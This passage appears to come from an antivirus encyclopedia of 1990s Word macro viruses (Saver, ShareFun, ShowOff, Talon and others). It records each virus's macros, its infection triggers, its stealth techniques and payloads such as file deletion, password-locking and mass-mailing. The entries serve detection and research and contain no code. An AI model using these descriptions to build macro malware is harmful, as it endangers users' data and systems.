  24131. Common In-The-Wild: No
  24132. Description:
  24133.  
  24134. Saver activates when an infected document is saved
  24135. (DateiSpeichern).  It does not infect when the "DateiSpeichern"
  24136. macro already exists in the global template. The same is true
  24137. for documents.
  24138.  
  24139. Upon activation of the virus on April 21st the following
  24140. message will be displayed:
  24141.  
  24142. "   Saver(SEX) written by Spooky. Austria 1996   "
  24143.  
  24144. [Word_ShareFun.A]
  24145. Virus name: Word.ShareFun.A
  24146. Virus Type: Word macro virus
  24147. Number of macros: 9
  24148. Encrypted: No
  24149. Macro names: AutoExec, AutoOpen, FileExit, FileOpen, FileSave
  24150.              FileClose, ToolsMacro, FileTemplates, ShareTheFun
  24151. Size of macros: 1777
  24152. Place of origin: USA
  24153. Date of origin: 1997
  24154. Payload: Yes
  24155. Common In-The-Wild: Yes
  24156. Description:
  24157.  
  24158. ShareFun infects the global template when an infected
  24159. document is opened (AutoOpen). Further documents become
  24160. infected when they are opened (FileOpen), saved (FileSave),
  24161. closed (FileClose) or on activation of FileExit, ToolsMacro
  24162. and FileTemplates.
  24163.  
  24164. When an infected document is opened, the "ShareTheFun"
  24165. macro is called (probability of 25 percent) and the document
  24166. is saved to the root directory with the following name:
  24167.  
  24168. "Doc1.doc"
  24169.  
  24170. After that ShareFun looks for an active copy of MSMail.
  24171. There are two different outcomes:
  24172.  
  24173. 1. MSMail is inactive
  24174.    Result: Sharefun shuts down Windows.
  24175.  
  24176. 2. MSMail is active
  24177.    Result: Sharefun tries to take control of MSMail and sends
  24178.    3 e-mail messages to 3 randomly picked names from the
  24179.    address book.  Attached to the e-mail message, with the
  24180.    header "You have GOT to read this!", is the infected
  24181.    document.
  24182.  
  24183. By doing this ShareFun tries to spread itself to new users.
  24184.  
  24185. The above payload does not always work.
  24186.  
  24187. ShareFun also uses "ToolsMacro" and "FileTemplates" to make
  24188. recognition of an infected document more difficult (called
  24189. macro stealth technique).
  24190.  
  24191. Even though ShareFun was hyped by the marketing
  24192. department of one anti-virus company, it is very unlikely that
  24193. you will become infected with this virus. It remains to be a
  24194. research virus.
  24195.  
  24196. [Word_ShareFun]
  24197. Virus name: Word.ShareFun
  24198. Virus Type: Word macro virus
  24199. Number of macros: 9
  24200. Encrypted: No
  24201. Macro names:
  24202. Size of macros:
  24203. Place of origin:
  24204. Date of origin: February 1997
  24205. Destructive: No
  24206. Common In-The-Wild: No
  24207. Description:
  24208.  
  24209. This virus has 9 macros, all of which are encrypted. This virus
  24210. uses the "ToolsMacro" to make recognition of an infected document
  24211. more difficult (called macro stealth technique).
  24212.  
  24213. The macros are:
  24214.  
  24215. "AutoExec"
  24216. "AutoOpen"
  24217. "FileExit"
  24218. "FileOpen"
  24219. "FileSave"
  24220. "FileClose"
  24221. "ToolsMacro"
  24222. "ShareTheFun"
  24223. "FileTemplates"
  24224.  
  24225. The AutoExec macro sets the DisableAutomacros, while AutoOpen
  24226. randomly selects, with 25% probability, to hook ShareTheFun.
  24227.  
  24228. The Saveall submacro copies the above macros to the global
  24229. template (NORMAL.DOT) and to the new/open document file. (Detected
  24230. by MacroTrap's rule1.)
  24231.  
  24232. The following describes the functions of the other macros:
  24233.  
  24234. 1) FileExit: hooks AutoOpen's Saveall submacro
  24235.  
  24236. 2) FileOpen: hooks AutoOpen's Saveall submacro
  24237.  
  24238. 3) FileSave: hooks AutoOpen's Saveall submacro
  24239.  
  24240. 4) FileClose : hooks AutoOpen's Saveall submacro
  24241.  
  24242. 5) ToolsMacro: disables ToolsMacro and hooks AutoOpen's Saveall
  24243.                submacro
  24244.  
  24245. 6) ShareTheFun : checks whether or not the MSMail is active. If it
  24246.                  is, the virus hooks MSMail then sends 3 e-mail
  24247.                  messages to 3 randomly picked names from the
  24248.                  address book.  Attached to the e-mail message, with
  24249.                  the header "You have GOT to read this!", is the
  24250.                  infected document.
  24251.  
  24252. 7) FileTemplates: hooks AutoOpen's Saveall submacro
  24253.  
  24254. [Word_Showoff.A (Showofxx)]
  24255. Virus name: Word.Showoff.A (Showofxx)
  24256. Virus Type: Word macro virus
  24257. Number of macros: 3
  24258. Encrypted: Yes
  24259. Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
  24260. Size of macros: 6789 Bytes
  24261. Place of origin: Unknown
  24262. Date of origin: Unknown
  24263. Payload: No
  24264. Seen In-The-Wild: No
  24265. Description:
  24266.  
  24267. Showoff infects the global template (normal.dot) when an
  24268. infected file is opened. Further documents become infected
  24269. when they are closed.
  24270.  
  24271. Showoff.A is most likely a corrupted "mutation" of another
  24272. variant.  The "Show" macro ("AutoExec" macro after
  24273. infecting the global template) contains invalid Wordbasic
  24274. instructions.  Due to those instructions, Showoff displays the
  24275. following error message when Word is started:
  24276.  
  24277. "   Out of Memory   "
  24278.  
  24279. Microsoft Word is not affected with garbage codes, thus the virus
  24280. is able to infect other documents.
  24281.  
  24282. [Word.Showoff.B (Showofxx)]
  24283. Virus name: Word.Showoff.B (Showofxx)
  24284. Virus Type: Word macro virus
  24285. Number of macros: 3
  24286. Encrypted: Yes
  24287. Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
  24288. Size of macros: 7955 Bytes
  24289. Place of origin: Unknown
  24290. Date of origin: January 1997
  24291. Payload: No
  24292. Seen In-The-Wild: No
  24293. Description:
  24294.  
  24295. Showoff.B infects the global template (normal.dot) when an
  24296. infected document is opened. Further documents become
  24297. infected when they are closed.
  24298.  
  24299. The "Show" macro ("AutoExec" macro after infecting the
  24300. global template) contains invalid Wordbasic (corrupted)
  24301. instructions.  Due to those instructions, Showoff displays an
  24302. error message.
  24303.  
  24304. Microsoft Word is not affected with corrupted macros, thus the
  24305. virus is able to infect other documents.
  24306.  
  24307. [Word_Showoff.C (Showofxx)]
  24308. Virus name: Word.Showoff.C (Showofxx)
  24309. Virus Type: Word macro virus
  24310. Number of macros: 3
  24311. Encrypted: Yes
  24312. Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
  24313. Size of macros: 4758 Bytes
  24314. Place of origin: Australia
  24315. Date of origin: January 1997
  24316. Payload: No
  24317. Seen In-The-Wild: Yes
  24318. Description:
  24319.  
  24320. ShowOff.C is the original virus for the ShowOff virus family.
  24321. Most likely, other corrupted variants (such as ShowOff.A
  24322. and B) are based on its code.
  24323.  
  24324. ShowOff.C infects the global template (normal.dot) when an
  24325. infected document is opened. Further documents become
  24326. infected when they are closed.
  24327.  
  24328. Unlike other macro viruses, ShowOff.C does not contain any
  24329. destructive payloads. It only displays some messages.
  24330.  
  24331. [Word_ShowOff.D]
  24332. Virus name: Word.ShowOff.D
  24333. Virus Type: Word macro virus
  24334. Number of macros: 3
  24335. Encrypted: Yes
  24336. Macro names: AutoOpen, Show, Cfxx
  24337. Size of macros: 6789 Bytes
  24338. Place of origin: Unknown
  24339. Date of origin: February 1997
  24340. Destructive: No
  24341. Common In-The-Wild: No
  24342. Description:
  24343.  
  24344. The difference between this new variant and the original
  24345. ShowOff virus is that the "Show" (AutoExec in the global
  24346. template) macro is corrupted. Due to this corruption, Microsoft
  24347. Word displays the following error message when Word is started:
  24348.  
  24349. "   Out of memory   "
  24350.  
  24351. Even with this error, ShowOff.D is still able to spread and
  24352. infect other documents.
  24353.  
  24354. For more information, please refer to the ShowOff.A virus
  24355. description.
  24356.  
  24357. [Word_Showoff.E (Showofxx)]
  24358. Virus name: Word.Showoff.E (Showofxx)
  24359. Virus Type: Word macro virus
  24360. Number of macros: 3
  24361. Encrypted: Yes
  24362. Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
  24363. Size of macros: 7955 Bytes
  24364. Place of origin: Europe
  24365. Date of origin: January 1997
  24366. Payload: Yes
  24367. Seen In-The-Wild: No
  24368. Description:
  24369.  
  24370. Showoff.E infects the global template (normal.dot) when an
  24371. infected document is opened. Further documents become
  24372. infected when they are closed.
  24373.  
  24374. Showoff.E combines with the Bandung virus, using its destructive
  24375. "AutoExec" macro. The "Show" macro ("AutoExec" macro after infecting
  24376. the global template) contains the destructive code, which is activated
  24377. when Microsoft Word is started.
  24378.  
  24379. For more information, please refer to the Bandung.A virus
  24380. description.
  24381.  
  24382. [Word_Showoff.F (Showofxx)]
  24383. Virus name: Word.Showoff.F (Showofxx)
  24384. Virus Type: Word macro virus
  24385. Number of macros: 3
  24386. Encrypted: Yes
  24387. Macro names: AutoOpen, Show, Cfxx, (Ofxx, AutoClose, AutoExec)
  24388. Size of macros: 4758 Bytes
  24389. Place of origin: Unknown
  24390. Date of origin: Spring 1997
  24391. Payload: No
  24392. Seen In-The-Wild: No
  24393. Description:
  24394.  
  24395. ShowOff.F infects the global template (normal.dot) when an
  24396. infected document is opened. Further documents become
  24397. infected when they are closed.
  24398.  
  24399. The main difference between this new variant and previous
  24400. ShowOff viruses is that ShowOff.F does not display the
  24401. following message:
  24402.  
  24403. "   TO ONE OF US, PEACE ! HAPPY BIRTHDAY!!!   "
  24404.  
  24405. [Word_Simple.A (Intended)]
  24406. Virus name: Word.Simple.A (Intended)
  24407. Virus Type: Word macro virus
  24408. Number of macros: 2
  24409. Encrypted: Yes
  24410. Macro names: AutoOpen, Simple
  24411. Size of macros: 272 Bytes
  24412. Place of origin: Unknown
  24413. Date of origin: Spring 1997
  24414. Destructive: No
  24415. Seen In-The-Wild: No
  24416. Description:
  24417.  
  24418. Simple.A is another macro virus that does not work properly.
  24419. It is not infectious, therefore it is very unlikely that
  24420. users will run into documents infected with this virus.
  24421.  
  24422. [Word_Simple.B ]
  24423. Virus name: Word.Simple.B
  24424. Virus Type: Word macro virus
  24425. Number of macros: 2
  24426. Encrypted: Yes
  24427. Macro names: AutoOpen, Simple
  24428. Size of macros: 264 Bytes
  24429. Place of origin: Unknown
  24430. Date of origin: April 1997
  24431. Destructive: No
  24432. Seen In-The-Wild: No
  24433. Description:
  24434.  
  24435. Simple.B infects the global template when an infected
  24436. document is opened. Further documents become infected
  24437. when they are also opened (AutoOpen).
  24438.  
  24439. The main difference between this new variant and the older
  24440. Simple.A virus is that Simple.B is infectious and also displays
  24441. the following message:
  24442.  
  24443. "   The Concept is Simple!   "
  24444.  
  24445. [Word_Smiley.A]
  24446. Virus name: Word.Smiley.A
  24447. Virus Type: Word macro virus
  24448. Number of macros: 8
  24449. Encrypted: Yes
  24450. Macro names: AutoExec, AutoExit, AutoOpen, DateiSpeichern,
  24451.              DateiSpeichernUnter, DateiDrucken, Timer
  24452.              DateiDruckenStandard
  24453. Size of macros: 6435 Bytes
  24454. Place of origin: Germany
  24455. Date of origin: Unknown
  24456. Destructive: Yes
  24457. Seen In-The-Wild: No
  24458. Description:
  24459.  
  24460. Smiley is another macro virus written for the German version
  24461. of Microsoft Word.
  24462.  
  24463. Smiley infects the global template (normal.dot) when an
  24464. infected document is opened.  Further documents become
  24465. infected when they are saved with the DateiSpeichern and
  24466. DateiSpeichernUnter commands.
  24467.  
  24468. To make recognition of an infected document more difficult,
  24469. Smiley removes the Extras/Makro and Datei/Dokumentvorlage
  24470. option (called macro stealth technique).
  24471.  
  24472. When Word is started (AutoExec), Smiley puts the string
  24473. "Smiley=xx" into the [windows] section of win.ini (inside the
  24474. Windows directory).  "xx" represents a number.
  24475.  
  24476. 14 days after the first infection, Smiley changes the
  24477. Tools/Options/Userinfo to the following:
  24478.  
  24479. "   Name: Smiley Corporation   "
  24480. "   Initials:   SC   "
  24481. "   Address:   Greenpeace   "
  24482.  
  24483. Furthermore, Smiley removes the following menu items:
  24484.  
  24485. Datei/Makro
  24486. Datei/Dokumentvorlage
  24487. Ansicht/Symbolleisten
  24488. Extras/Anpassen
  24489.  
  24490. 56 days after the first infection, Smiley creates a new
  24491. C:\AUTOEXEC.BAT file and formats the hard drive upon the next
  24492. boot-up.
  24493.  
  24494. Upon Exiting Word (AutoExit), Smiley displays various
  24495. messages and adds them at the end of a printed document.
  24496.  
  24497. [Word_Snickers.A ]
  24498. Virus name: Word.Snickers.A
  24499. Virus Type: Word macro virus
  24500. Number of macros: 2
  24501. Encrypted: No
  24502. Macro names: AutoOpen, AutoClose
  24503. Size of macros: 420 Bytes
  24504. Place of origin: Unknown
  24505. Date of origin: Spring 1997
  24506. Destructive: Yes
  24507. Seen In-The-Wild: No
  24508. Description:
  24509.  
  24510. Snickers.A does not infect the global template (normal.dot)
  24511. unlike many other macro viruses. It uses a new type of infection
  24512. (called direct action). It infects documents during the following
  24513. processes:
  24514.  
  24515. 1. An uninfected document is opened.
  24516.    It becomes listed in the MRU (Most recently used) list.
  24517.  
  24518. 2. An infected document is opened.
  24519.    The virus tries to infect all the files listed in the MRU list.
  24520.  
  24521. Snickers has another annoying payload (AutoClose). During
  24522. infection, it encrypts the text by swapping adjacent characters.
  24523. The text is decrypted when an infected document is opened
  24524. (AutoOpen).
  24525.  
  24526. Virus scanners that only remove the macros will have the document
  24527. text encrypted.
  24528.  
  24529. [Word_Spooky.A]
  24530. Virus name: Word.Spooky.A
  24531. Virus Type: Word macro virus
  24532. Number of macros: 9
  24533. Encrypted: Yes
  24534. Macro names: autoexec, AutoOpen, dateidokvorlagen, dateidrucken,
  24535.              dateidruckenstandard, extrasmakro, DateiSpeichernUnter,
  24536.              DateiOeffnen, Spooky
  24537. Size of macros: 3114 Bytes
  24538. Place of origin: Austria
  24539. Date of origin: September 1996
  24540. Payload: Yes
  24541. Common In-The-Wild: No
  24542. Description:
  24543.  
  24544. Spooky activates when an infected document is opened
  24545. (AutoOpen).  Further documents become infected when they
  24546. are opened (DateiOeffnen) or saved (DateiSpeichernUnter).
  24547. Spooky does not infect when the "Spooky" macro already
  24548. exists in the global template (normal.dot) or a document.
  24549.  
  24550. Spooky disables the File/Templates and Tools/Macro menu
  24551. items in order to make recognition of an infected file more
  24552. difficult (called macro stealth technique).
  24553.  
  24554. If a user tries to select one of the two options he/she is prompted
  24555. for a password. Upon entering "ykoops" at the prompt in the
  24556. status bar, the original menus reappear. Entering an incorrect
  24557. password displays the following message:
  24558.  
  24559. "   Sie haben das falsche Passwort eingegeben   "
  24560.  
  24561. translated:
  24562.  
  24563. "   You have entered the wrong password   "
  24564.  
  24565.  
  24566. Spooky randomly displays the following message in the
  24567. status bar:
  24568.  
  24569. "   Word.Spooky   "
  24570.  
  24571. When a user prints out a document with the system time between
  24572. 55 and 59, Spooky inserts the following text at the end
  24573. of the printout:
  24574.  
  24575. "   Word.Spooky   "
  24576.  
  24577. [Word_Stryx.A ]
  24578. Virus name: Word.Stryx.A
  24579. Virus Type: Word macro virus
  24580. Number of macros: 4
  24581. Encrypted: Yes
  24582. Macro names: DateiSchliessen, DokumentSchliessen, Stryx1,
  24583.              Stryx2, StryxOne, StryxTwo
  24584. Size of macros: 25669 Bytes
  24585. Place of origin: Germany
  24586. Date of origin: September 1996
  24587. Payload: Yes
  24588. Common In-The-Wild: No
  24589. Description:
  24590.  
  24591. While Stryx has 4 macros, some of them are only available in
  24592. the global template or in documents.
  24593.  
  24594. "Stryx1" (only in the global template)
  24595. "Stryx2" (only in the global template)
  24596. "StryxOne" (only in documents)
  24597. "StryxTwo" (only in documents)
  24598.  
  24599. Activation of Stryx occurs when a document is closed
  24600. (DateiSchliessen and DokumentSchliessen). Stryx then
  24601. modifies the "Int1" section of win.ini (Windows directory).
  24602. It sets a YES to the value of the installed init string and creates
  24603. a .GIF picture of a dragon (based on a hex dump).
  24604. Upon closing a document on December 1st, a new document
  24605. is created and the picture of the dragon is inserted. Followed
  24606. by the dragon is:
  24607.  
  24608. "   STRYX!!!!    "
  24609. "   Look at your HD! :-)   "
  24610. "   Sorry, but it's so funny!   "
  24611. "   NJ 1996   "
  24612.  
  24613. Stryx does not infect when the "Stryx2" macro already exists
  24614. in the global template or when the "StryxTwo" macro already
  24615. exists in a document.
  24616.  
  24617. [Word_Surabaya.A]
  24618. Virus name: Word.Surabaya.A
  24619. Virus Type: Word macro virus
  24620. Number of macros: 6
  24621. Encrypted: No
  24622. Macro names: AutoExec, AutoOpen, Plong, FileSaveAs
  24623.              ToolsMacro, FileTemplates
  24624. Size of macros: 1832 Bytes
  24625. Place of origin: Unknown
  24626. Date of origin: Spring 1997
  24627. Payload: Yes
  24628. Seen In-The-Wild: Yes
  24629. Description:
  24630.  
  24631. Surabaya infects the global template (normal.dot) when an
  24632. infected document is opened. Further documents become
  24633. infected when they are saved (FileSaveAs).
  24634.  
  24635. Surabaya uses ToolsMacro and FileTemplates to make
  24636. recognition of an infected document more difficult (called
  24637. macro stealth technique).  We advise not to access the two
  24638. menu items, since they often execute the viral code. In case of
  24639. Surabaya, they display a message with "   Sorry...   " in it.
  24640.  
  24641. Whenever Microsoft Word is started from an infected global
  24642. template, the following message is displayed in the status bar:
  24643.  
  24644. "   Lontong Micro Device ( c ) 1993 By ICE-Man   "
  24645.  
  24646. Surabaya also adds the following text to the "Author" section of
  24647. C:\WINDOWS\WIN.INI:
  24648.  
  24649. "   Name=TebeYe'93 The ICE-Man   "
  24650.  
  24651. [Word_Switcher.a]
  24652. Virus name: Word.Switcher.a
  24653. Virus Type: Word macro virus
  24654. Number of macros: 10
  24655. Encrypted: Yes
  24656. Macro names: AutoExec, AutoOpen, Autoclose, FileOpen, FileSave
  24657.              FileSaveAs, FileClose, FilePrint, FileTemplates,
  24658.              Toolsmacro
  24659. Size of macros: 2328 Bytes
  24660. Place of origin: Unknown
  24661. Date of origin: April 1997
  24662. Destructive: Yes
  24663. Seen In-The-Wild: Yes
  24664. Description:
  24665.  
  24666. Switcher activates when an infected document is opened.
  24667.  
  24668. It uses "ToolsMacro" and "FileTemplates" to make recognition
  24669. of an infected document more difficult (called macro stealth
  24670. technique).  When a user selects one of the two menu items, it
  24671. displays the following message:
  24672.  
  24673. "   Configuration conflict - menu item is not available.   "
  24674.  
  24675. Switcher has various destructive payloads. When Microsoft
  24676. Word is started (AutoExec), Switcher triggers (probability of
  24677. 1/60) and tries to delete one of the following:
  24678.  
  24679. "   c:\msoffice\excel\*.xls   "   (Microsoft Excel Spreadsheets)
  24680.  
  24681. "   c:\access\*.mdb   "   (Microsoft Access database files)
  24682.  
  24683. "   c:\msoffice\access\*.mdb   "   (Microsoft Access database files)
  24684.  
  24685. "   c:\windows\*.grp   "   (Windows files
  24686.  
  24687. "   c:\*.hlp   "   (Windows Help files)
  24688.  
  24689. The second payload (located in AutoClose) checks the seconds
  24690. time field and in case of a value of less than 10, it
  24691. generates two random digits and changes all instances of 1.
  24692.  
  24693. Example: "1" is replaced by "2" in the active document.
  24694.  
  24695. In addition, the following messages can be found in the "AutoExec"
  24696. macro:
  24697.  
  24698. "   *** I'm a little pest! ***   "
  24699. "   The LITTLE PEST self-propagating macro is by *Sly Ellga*,   "
  24700. "   a guy who thinks it's funny to screw around
  24701. "   with other people's data   "
  24702.  
  24703. [Word_Swlabsl (Kit) (a.k.a. 1.0a)]
  24704. Virus Name: Word.Swlabs1 (Kit) (a.k.a. 1.0a)
  24705. Virus Type: Word macro virus
  24706. Size of executable: 117,248 Bytes
  24707. Place of origin: USA
  24708. Date of origin: January 1997
  24709. Description:
  24710.  
  24711. Swlabs1 is another Microsoft Word construction kit written
  24712. in Microsoft Visual C++ for Win32. It is presented as a text
  24713. editor with a virus creation wizard.
  24714.  
  24715. There are two ways of creating new viruses:
  24716.  
  24717. 1. Virus source *only* if no copy of Microsoft Word is found.
  24718.  
  24719. 2. Fully functional macro virus if Microsoft Word is found.
  24720.  
  24721. Swlabs1 uses the document "SKAMMY.DOC" when
  24722. communicating with Microsoft Word. It contains the macro
  24723. "Test" (2137 Bytes), which pastes the source from the
  24724. clipboard, breaks them into different macros and then exits
  24725. Word to go back to the Swlabs construction kit.
  24726.  
  24727. [Word_Swlabs.A (aka. Skam)]
  24728. Virus name: Word.Swlabs.A (aka. Skam)
  24729. Virus Type: Word macro virus
  24730. Number of macros: 1
  24731. Encrypted: No
  24732. Macro names: AutoOpen
  24733. Size of macros: 512 Bytes
  24734. Place of origin: Unknown
  24735. Date of origin: Spring 1997
  24736. Destructive: No
  24737. Seen In-The-Wild: Yes
  24738. Description:
  24739.  
  24740. Swlabs.A infects the global template (normal.dot) when
  24741. an infected document is opened. Further documents become
  24742. infected when they are also opened (AutoOpen).
  24743.  
  24744. Swlabs.A removes ToolsMacro and FileTemplates to make
  24745. recognition of an infected file more difficult (called
  24746. macro stealth technique).
  24747.  
  24748. It does not contain any payload only the following comment:
  24749.  
  24750. "   What" No Payload? WUSSY!   "
  24751.  
  24752. Swlabs.A is another virus that was created with a macro
  24753. virus generator.
  24754.  
  24755. [Word_Swlabs.B]
  24756. Virus name: Word.Swlabs.B
  24757. Virus Type: Word macro virus
  24758. Number of macros: 3
  24759. Encrypted: No
  24760. Macro names: AutoOpen, FileNew, FileSave
  24761. Size of macros: 2145 Bytes
  24762. Place of origin: Unknown
  24763. Date of origin: Spring 1997
  24764. Destructive: No
  24765. Seen In-The-Wild: No
  24766. Description:
  24767.  
  24768. Swlabs.B infects the global template (normal.dot) when
  24769. an infected document is opened. Further documents become
  24770. infected when they are also opened (AutoOpen), created
  24771. (FileNew), or saved (FileSave).
  24772.  
  24773. Swlabs.B does not contain any destructive payload only the
  24774. following comment is added to the File|Properties\Summary|
  24775. Subject section:
  24776.  
  24777. "   Green Bay Packers -- Super Bowl XXXI Champions  "
  24778.  
  24779. Swlabs.B is another virus that was created with a macro
  24780. virus generator.
  24781.  
  24782. [Word_Talon.A]
  24783. Virus name: Word.Talon.A
  24784. Virus Type: Word macro virus
  24785. Number of macros: 6
  24786. Encrypted: Yes
  24787. Macro names: AOB, Deed, FSAB, Info, AutoOpen (FileSaveAs),
  24788.              ToolsMacro
  24789. Size of macros: 2052 Bytes in documents
  24790.                 2008 Bytes in global template
  24791. Place of origin: USA
  24792. Date of origin: March 1997
  24793. Payload: Yes
  24794. Seen In-The-Wild: No
  24795. Description:
  24796.  
  24797. Talon infects the global template (normal.dot) when an
  24798. infected document is opened (AutoOpen). Further documents
  24799. become infected when they are saved (FileSaveAs).
  24800.  
  24801. Talon triggers on June 18th. It then displays an unending
  24802. series of message boxes:
  24803.  
  24804. "   Your System Is Infected With The Macro Virus Talon #1!   "
  24805. "   This Macro Virus Was Brought To You By: TALON 1997   ".
  24806.  
  24807. When the user tries to select the "ToolsMacro" menu option,
  24808. Talon displays the following information:
  24809.  
  24810. "   Warning   "
  24811. "   This Option Is Not Available, Please Insert The MS-Office CD   "
  24812. "   And Install The Help Files To Continue.   "
  24813.  
  24814. Additional information can be found in the "Info" macro:
  24815.  
  24816. "    *********************************************   "
  24817. "                  Talon #1                          "
  24818. "           June 18 Payload Activates                "
  24819. "               Displays Message                     "
  24820. "       All Files Encrypted Except Info File         "
  24821. "                                                    "
  24822. "              Brought To You By                     "
  24823. "                   "Talon"                          "
  24824. "    *********************************************   "
  24825.  
  24826. [Word_Talon.B]
  24827. Virus name: Word.Talon.B
  24828. Virus Type: Word macro virus
  24829. Number of macros: 6
  24830. Encrypted: Yes
  24831. Macro names: AOB, FSAB, Info, AutoOpen (FileSaveAs),
  24832.              ToolsMacro, Password
  24833. Size of macros: 1953 Bytes in documents
  24834.                 1887 Bytes in global template
  24835. Place of origin: USA
  24836. Date of origin: March 1997
  24837. Payload: Yes
  24838. Seen In-The-Wild: No
  24839. Description:
  24840.  
  24841. Talon.B infects the global template (normal.dot) when an
  24842. infected document is opened (AutoOpen). Further documents
  24843. become infected when they are saved (FileSaveAs).
  24844.  
  24845. It triggers on the 27th of each month when it saves the active
  24846. document with the password "   talon   " and then displays the
  24847. following message:
  24848.  
  24849. "   Warning   "
  24850. "   Your document Has Just been Been Saved, I Hope You Know   "
  24851. "   The Password!!!   ",  Brought To You By Talon 1997   "
  24852.  
  24853. Another difference between this new variant and the original
  24854. Talon virus is that the "ToolsMacro" menu option displays the
  24855. following information:
  24856.  
  24857. "   This Option Is Not Available, Please Install The   "
  24858. "    Help Files To Continue.   "
  24859.  
  24860. [Word_Talon.C]
  24861. Virus name: Word.Talon.C
  24862. Virus Type: Word macro virus
  24863. Number of macros: 6
  24864. Encrypted: Yes
  24865. Macro names: AOB, FSAB, Info, AutoOpen (FileSaveAs),
  24866.              ToolsMacro, ToolsSpelling
  24867. Size of macros: 2001 Bytes in documents
  24868.                 1981 Bytes in global template
  24869. Place of origin: USA
  24870. Date of origin: March 1997
  24871. Payload: Yes
  24872. Seen In-The-Wild: No
  24873. Description:
  24874.  
  24875. Talon.C infects the global template (normal.dot) when an
  24876. infected document is opened (AutoOpen). Further documents
  24877. become infected when they are saved (FileSaveAs).
  24878.  
  24879. It triggers on Mondays during the month of June. This
  24880. only happens when a user activates the spellchecker.
  24881. Talon.C then saves the active document with the password
  24882. "  talon3  " and then loops through three message boxes:
  24883.  
  24884. "   I Have A Word For You To Spell V I R U S   "
  24885.  
  24886. "   Your document Has Just been Been Saved By The Word Macro Virus   "
  24887. "   Talon #3, I Hope You Know The Password!!!   "
  24888.  
  24889. "   Brought To You By Talon 1997   "
  24890.  
  24891. Another difference between this new variant and the original
  24892. Talon virus is that the "ToolsMacro" menu option displays
  24893. the following information:
  24894.  
  24895. "    This option is not available now. Please install the   "
  24896. "    HELP files To continue.   "
  24897.  
  24898. [Word_Talon.D]
  24899. Virus name: Word.Talon.D
  24900. Virus Type: Word macro virus
  24901. Number of macros: 6
  24902. Encrypted: Yes
  24903. Macro names: Scramble, AutoClose, Info, AutoOpen, FileSaveAs,
  24904.              ToolsMacro
  24905. Size of macros: 2079 Bytes
  24906. Place of origin: USA
  24907. Date of origin: April 1997
  24908. Payload: Yes
  24909. Seen In-The-Wild: No
  24910. Description:
  24911.  
  24912. Talon.D infects the global template (normal.dot) when an
  24913. infected document is opened (AutoOpen). Further documents
  24914. become infected when they are saved (FileSaveAs) or closed
  24915. (AutoClose).
  24916.  
  24917. It triggers on Fridays when it saves the active document
  24918. with the password "  talon4  " and then loops through the
  24919. following message boxes:
  24920.  
  24921. "   Your document Is Infected With The Macro Virus Talon 4   "
  24922.  
  24923. "   Your document Has Just been Been Saved, I Hope You Know   "
  24924. "   The Password!!!   ",
  24925.  
  24926. "   Talon Strikes Again 1997   "
  24927.  
  24928. Another difference between this new variant and the original
  24929. Talon virus is that the "ToolsMacro" menu option displays the
  24930. following information:
  24931.  
  24932. "    This option is not available right now. Please install the   "
  24933. "    HELP files To continue.   "
  24934.  
  24935. [Word_Talon.E]
  24936. Virus name: Word.Talon.E
  24937. Virus Type: Word macro virus
  24938. Number of macros: 7
  24939. Encrypted: Yes
  24940. Macro names: Scramble, AutoClose, Info, Menu, AutoOpen,
  24941.              FileSaveAs, ToolsMacro
  24942. Size of macros: 2323 Bytes
  24943. Place of origin: USA
  24944. Date of origin: April 1997
  24945. Payload: Yes
  24946. Seen In-The-Wild: No
  24947. Description:
  24948.  
  24949. Talon.E infects the global template (normal.dot) when an
  24950. infected document is opened (AutoOpen). Further documents
  24951. become infected when they are saved (FileSaveAs) or closed
  24952. (AutoClose).
  24953.  
  24954. The main difference between this new variant and the
  24955. previous Talon viruses is that this virus adds a new menu item
  24956. (Talon). When a user selects the item, Talon.E triggers and the
  24957. active document is saved with the password "   talon5   ".
  24958.  
  24959. After that it enters a loop of message boxes:
  24960.  
  24961. "  Thank You so Much For Pressing That Button,   "
  24962. "  I Thought I Would Never Be Activated.   "
  24963.  
  24964. "  Word Macro Virus Talon 5   "
  24965.  
  24966. "   Talon Strikes Again   "
  24967.  
  24968. Another difference between this new variant and the original
  24969. Talon virus is that the "ToolsMacro" menu option displays the
  24970. following information:
  24971.  
  24972. "    This option is not available right now. Please install the   "
  24973. "    HELP files To continue.   "
  24974.  
  24975. [Word_Talon.F]
  24976. Virus name: Word.Talon.F
  24977. Virus Type: Word macro virus
  24978. Number of macros: 6
  24979. Encrypted: Yes
  24980. Macro names: Scramble, AutoClose, Info, AutoOpen,
  24981.              FileSaveAs, ToolsMacro
  24982. Size of macros: 2194 Bytes
  24983. Place of origin: USA
  24984. Date of origin: April 1997
  24985. Payload: Yes
  24986. Seen In-The-Wild: No
  24987. Description:
  24988.  
  24989. Talon.F infects the global template (normal.dot) when an
  24990. infected document is opened (AutoOpen). Further documents
  24991. become infected when they are saved (FileSaveAs) or closed
  24992. (AutoClose).
  24993.  
  24994. The main difference between this new variant and the previous
  24995. Talon viruses is that the virus author tried the anti-heuristic
  24996. techniques.
  24997.  
  24998. Another difference between this new variant and the very
  24999. similar Talon.D variant is that the "ToolsMacro" menu option
  25000. displays the following information:
  25001.  
  25002. "   Please Install The HELP Files To Continue   "
  25003. "   Option Not Installed   "
  25004.  
  25005. [Word_Talon.G]
  25006. Virus name: Word.Talon.G
  25007. Virus Type: Word macro virus
  25008. Number of macros: 7
  25009. Encrypted: No
  25010. Macro names: Scramble, AutoClose, Scramble2, AutoOpen,
  25011.              FileSaveAs, ToolsMacro, Mentor
  25012. Size of macros: 6280 Bytes
  25013. Place of origin: USA
  25014. Date of origin: April 1997
  25015. Payload: Yes
  25016. Seen In-The-Wild: No
  25017. Description:
  25018.  
  25019. Talon.G infects the global template (normal.dot) when an
  25020. infected document is opened (AutoOpen). Further documents
  25021. become infected when they are saved (FileSaveAs) or closed
  25022. (AutoClose).
  25023.  
  25024. The main difference between this new variant and the
  25025. previous Talon viruses is that Talon.G adds two menu items
  25026. to the Help file (called "Talon 5" and "About Talon 5").
  25027.  
  25028. When selected, Talon triggers and displays an article from the
  25029. virus author in the Microsoft Word macro editor.
  25030. It then prints 999 copies of the article and displays the
  25031. following messages:
  25032.  
  25033. "   Talon Strikes Again    "
  25034.  
  25035. "   Word Macro Virus Talon 5  AKA The Mentor   "
  25036.  
  25037. [Word_Talon.H]
  25038. Virus name: Word.Talon.H
  25039. Virus Type: Word macro virus
  25040. Number of macros: 4
  25041. Encrypted: Yes
